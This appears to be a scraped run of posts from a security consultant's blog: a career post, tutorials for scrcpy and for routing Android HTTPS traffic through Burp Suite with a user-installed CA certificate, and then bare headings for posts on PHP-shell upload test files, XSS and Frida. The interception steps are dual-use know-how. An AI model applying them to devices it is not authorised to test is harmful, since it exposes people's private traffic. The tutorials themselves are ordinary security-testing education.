In this blog post, we set up the environment so it is ready when we start building the chatbot on the next post that I'm publishing next week!

You can also follow my Instagram @whatminjahacks if you are interested to see more about my days as a Cyber Security consultant and learn more about cyber security with me!

Becoming a Cyber Security Advocate: Importance of Role Models

whatminjacodes [she/they] — Fri, 01 Mar 2024 09:00:00 +0000

I have been working in cybersecurity for almost two years now. I began my career as a software developer, but after a few years in that role, I had the opportunity to become an ethical hacker.

I was excited about the opportunity and decided to make the switch, even though I didn't know much about hacking. However, I had been enthusiastic about cybersecurity for years by that time, so I was sure I would learn the ropes, and the work would be something I enjoy.

When contemplating whether to make the switch, I tried looking for people who talk about their work as a hacker. And I couldn't find that many people! The field was so new for me that I didn't even really know what to search for. I started to hesitate, because I wasn't sure what I was getting into.

There are many Instagram accounts where people working in tech tell about their lives, and I was sure I would find someone from whom I could learn about what it's like to be a hacker. I realized I had been in the minority in software development, but I might be in an even smaller diversity group in cybersecurity. There are women and other minorities working in cyber, but not many are visible online. And that is understandable! Some jobs in cyber even become impossible if your face is too well-known to the public.

Luckily now, after two years of working in cyber, I have found others who share about their work too. I've even become familiar with the Women4Cyber foundation, and I ordered their book called "Hacking Gender Barriers: Europe’s Top Cyber Women", which gave me lots of knowledge about what different jobs women are working on in cyber.

But I was genuinely surprised at how difficult it was to find role models. So when I started my journey into cybersecurity and a career as a hacker, I decided to create an Instagram account (@whatminjahacks) where I talk about my job and where I can be visible as myself, a person who loves everything pink and cute. I felt that's important since the stereotype of a hacker is still someone who wears a black hoodie and works in a dimly lit room.

A hacker can also be wearing pink and having plushies and Pokemon figures on their workdesk.

Mobile Security Tools part 1: scrcpy

whatminjacodes [she/they] — Thu, 12 Oct 2023 10:48:45 +0000

Mobile Security Tools-series:

Part 1: scrcpy

Part 2: Frida

What is scrcpy?

SCRCPY (Screen Copy) is a free and open source application that allows users to mirror their Android device’s screen on their computer.

It is available for Windows, macOS, and Linux and doesn't need a rooted or jailbroken phone.

It allows to control the device with the keyboard and the mouse of the computer.

Some of the features:

mirror screen on computer
copy-paste in both directions
record screen
use Android with mouse and keyboard
audio forwarding

Tutorial

Let's install and use scrcpy next. Note that you don't need a rooted device to follow this tutorial.

Prerequisites

This tutorial will not go through how to to connect your phone to be used for developing. Check the tutorial from Android Developer website if you haven't done that before.

My setup:
I'm using a rooted Pixel 6a
Android 13
Ubuntu 22.04.3 LTS
Android Platform Tools downloaded

If you are new to adb, I recommend you to first read what it is.

Check other needed prerequisites from the scrcpy GitHub.

Install scrcpy

This differs depending on your setup, so if you have something else than Debian or Ubuntu, then check the installation instructions from scrcpy GitHub.

On Debian and Ubuntu, scrcpy can be installed by running:

sudo apt install scrcpy

Choose a connected device

You can check all the connected devices by going to platform-tools folder and by calling:

./adb devices

That command lists the connected devices and shows their id:

List of devices attached
331[REDACTED]804    device

Remember to put your phone on file transfer mode.

If there is only one device connected, scrcpy will default to that. However, if there are multiple devices, you must specify the one to use by it's id:

scrcpy -s 331[REDACTED]804

Start scrcpy

You start scrcpy by simply calling scrcpy on terminal.

The tool opens a new window which shows the screen of your phone.

Record a video

Let's test one of the features to make sure everything is working as intended.

You can record a video of the screen of your phone by running:

scrcpy --record filename.mp4

The saved video can be found from the folder you are currently in.

That's it!

I hope this blog post helped you to understand what scrcpy is and how it can be used!

You can also follow my Instagram @whatminjahacks if you are interested to see more about my days as a Cyber Security consultant and learn more about cyber security with me!

How to setup Burp Suite on Android

whatminjacodes [she/they] — Fri, 29 Sep 2023 14:27:32 +0000

On this blog post I want to go through how to setup your Android phone to send traffic to Burp Suite.

Prerequisites

This tutorial will not go through how to connect your phone to be used for developing. Check the tutorial from Android Developer website if you haven't done that before.

The phone you use doesn't need to be rooted, but USB debugging from developer options needs to be set.

You should also know basics of Burp Suite.

My setup:
I'm using a rooted Pixel 6a
Android 13
Ubuntu 22.04.3 LTS
Android Platform Tools downloaded

If you are new to adb, I recommend you to get familiar with it first.

Tutorial

Let's just get started then!

Download and install Burp Suite Community

Burp Suite is a software security application that is used for security testing of applications. There is a free version available that you can use if you don't have a licence.

This tutorial is not going to go through how to use Burp Suite, so you should first familiarize yourself with the application if you are new to it. There are great tutorials on Portswigger that can help you get started.

Make sure intercept is off.

Get Burp certificate

To interact with HTTPS traffic, we need to install a CA certificate on our android device.

Go to Proxy tab and choose Proxy settings. Click on Import/export CA certificate and choose Certificate in DER format.

Choose a location to save the file to on the next window. Name the file for example cert.der.

Convert the cert to a valid format

A DER (Distinguished Encoding Rules) file is a digital certificate file that is created and stored in a binary format. It is a binary encoding for the X.509 certificates and private keys. In contrast to PEM (Privacy Enhanced Mail) files, DER files do not contain human-readable plain text statements such as —–BEGIN CERTIFICATE—–.

Using terminal, go to the location where you saved the DER file and convert it to .pem:

openssl x509 -inform der -in cert.der -out cert.pem

Push the cert to the device

Connect your phone to the computer using a cable and set the phone to file transfer mode. Make sure USB debugging is enabled from developer options.

You can check all the connected devices by going to platform-tools folder and by calling:

./adb devices

That command lists the connected devices and shows their id:

List of devices attached
331[REDACTED]804    device

If your device is listed with an id, it means the connection between phone and the computer should be ok.

Next, run the following command:

./adb push /path-to-file/cert.pem /sdcard/Download

This command will push the file to the Download folder on your phone.

If you don't know the path to a file, you can go to the folder where the file is located and run pwd in the terminal. This command returns the path to the current folder you are in.

Install cert on device

Open Setting on your phone, search for certificate and go to Install a certificate. Click on CA certificate.

The phone will show a warning about Your data won't be private and it will remind you to only install a certificate from an organization you trust. By installing this certificate, you can display requests sent from the phone on Burp Suite application. This means that also some sensitive data could be sent to Burp Suite. You shouldn't use your personal phone whenever you play around with all these tools.

Click Install anyway and locate the cert.pem file we copied to the phone.

Configure the device proxy

On the phone go to WiFi and click on the one you are connected to. Use the pencil icon (edit button) and go to Advanced options.

Go to Proxy and choose Manual. Insert localhost to Proxy host and 8080 to Proxy port. Save the settings.

Configure port forwarding

Sometimes you might need to configure port forwarding to get the proxy working. If the proxy doesn't work, you can run the following command:

./adb reverse tcp:8080 tcp:8080

adb reverse is a command that allows you to expose a port on your Android device to a port on your computer. Now when your phone tries to access the port 8080 (the common port for web traffic), your request will be routed to port 8080 of your computer.

Open a browser and test if http://example.com and https://example.com works. Both of these websites should now be sending traffic to Burp Suite Proxy tab.

That's it!

I hope this blog post helped you to understand how Burp Suite can be setup to be used on Android!

Follow me on Instagram @whatminjahacks for a behind-the-scenes look at my work as an Information Security Specialist at 2NS, and to learn more cybersecurity tips and insights!

Forem: whatminjacodes [she/they]

How to Create Security Test Files for File Upload

File upload test files

Regular files

EICAR files

What is EICAR?

eicar-text-document.txt

eicar-excel-document.xlsx

eicar-word-document.docx

PHP shells

php-shell.php

php-shell-directly-in-image.png

PHP shells using magic bytes

php-shell-added-to-end-png-magic-bytes.php

php-shell-with-jpeg-magic-bytes.php

php-shell-with-pdf-magic-bytes.php

png-file-with-php-payload-in-comment-metadata.png

php-shell-with-php-payload-in-png-comment-metadata-png-magic-bytes.php

Background

Mobile Security Tools part 3: Objection

Background

What is objection?

Tutorial

Prerequisites

Install objection

Testing with an app

What's next?

Practical Example of Escaping XSS Context

Understanding Context in Cross-Site Scripting (XSS)

What is "Escaping" in XSS?

Different XSS Contexts

Practical Example of Escaping XSS Context

That's it!

Background

Testing Authorization with Auth Analyzer in Burp Suite

Background

What is Auth Analyzer?

Tutorial

Prerequisites

Install Auth Analyzer Extension

Create an Account for the Test Webpage

Creating Sessions in Auth Analyzer

Testing Access Control with Auth Analyzer

That's it!

How to use PwnFox with Burp Suite

What is PwnFox, and why is it used?

Tutorial

Prerequisites

Setup PwnFox Browser Extension

Install PwnFox Burp Suite Extension

Using PwnFox with Burp Suite

That's it!

List of All My Blog Posts - with direct links

Cyber Security

Diversity, Equity and Inclusion

General

AR, VR & Android development

Mobile Security Tools part 2: Frida

Mobile Security Tools-series:

Part 1: scrcpy

Part 2: Frida

What is Frida?

Tutorial

Prerequisites

Install Frida

Find processor version of your phone

Download Frida server

Execute Frida server on the device

That's it!

Building a Simple Chatbot using GPT model - part 2

Install Required Libraries

Developing a Simple Chatbot

Running the Script

That's it!

Building a Simple Chatbot using GPT model - part 1

What are LLMs?

Setup the Environment

1. Update and Upgrade Ubuntu

2. Install Python

3. Install Virtual Environment Tools